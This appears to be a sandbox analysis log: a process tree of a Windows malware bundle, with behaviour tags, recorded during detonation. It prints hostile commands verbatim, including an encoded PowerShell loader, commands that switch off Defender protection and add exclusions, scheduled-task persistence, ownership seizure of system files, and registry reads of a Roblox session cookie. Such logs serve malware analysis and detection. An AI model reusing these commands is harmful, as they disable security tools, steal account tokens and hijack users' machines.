C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xgl47gPmnHhh.bat" "21⤵PID:1800
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6432
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5132 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:5384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1ynOZgQ0eLde.bat" "23⤵PID:5416
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:4108
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5232
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2480 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foovyd1NFOYo.bat" "25⤵PID:6408
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:2224
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1500
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:2040 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:1908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I9l6dGTGsxaV.bat" "27⤵PID:2520
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:5532
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4124
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:5424 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:5580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LjjjVHnLUNCE.bat" "29⤵PID:4332
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:2424
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3448
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\the.exethe.exe3⤵
- Executes dropped EXE
PID:6280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- UAC bypass
- Windows security bypass
- Manipulates Digital Signatures
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\the.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵PID:6604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"5⤵PID:1256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 1646⤵
- Program crash
PID:1304
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"5⤵PID:3344
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6548
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_1be6265f-e772-4426-bba0-260690167925\caller.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:4824
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6564
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\shell1.ps1"3⤵PID:2712
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4412
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6080
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6524
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5784
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:5416
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:7120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1388
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1860
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6252
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4956
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4920
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4108
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\freebobux.exefreebobux.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\48F6.tmp\freebobux.bat""4⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\SolaraBootstraper.exeSolaraBootstraper.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:6336 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6104 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6296
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"5⤵
- Views/modifies file attributes
PID:5096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵PID:3552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:5400
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:5580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5236
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:5508
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6656 -
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:6904 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6828
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6736
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\wim.dllwim.dll3⤵
- Executes dropped EXE
PID:5524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_b2703cb1-6783-46d2-a0f5-cf9b9eb4b072\load.cmd" "4⤵
- Checks computer location settings
- Modifies registry class
PID:3864 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_b2703cb1-6783-46d2-a0f5-cf9b9eb4b072\cringe.mp4"5⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5160
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_b2703cb1-6783-46d2-a0f5-cf9b9eb4b072\lol.ini5⤵PID:4420
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\web2.htm3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6672 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47184⤵PID:5196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:24⤵PID:4084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:84⤵PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:14⤵PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:14⤵PID:1860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:14⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:14⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:84⤵PID:3600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:14⤵PID:5524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:14⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:14⤵PID:7152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:14⤵PID:3440
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\xcer.cer3⤵
- Blocklisted process makes network request
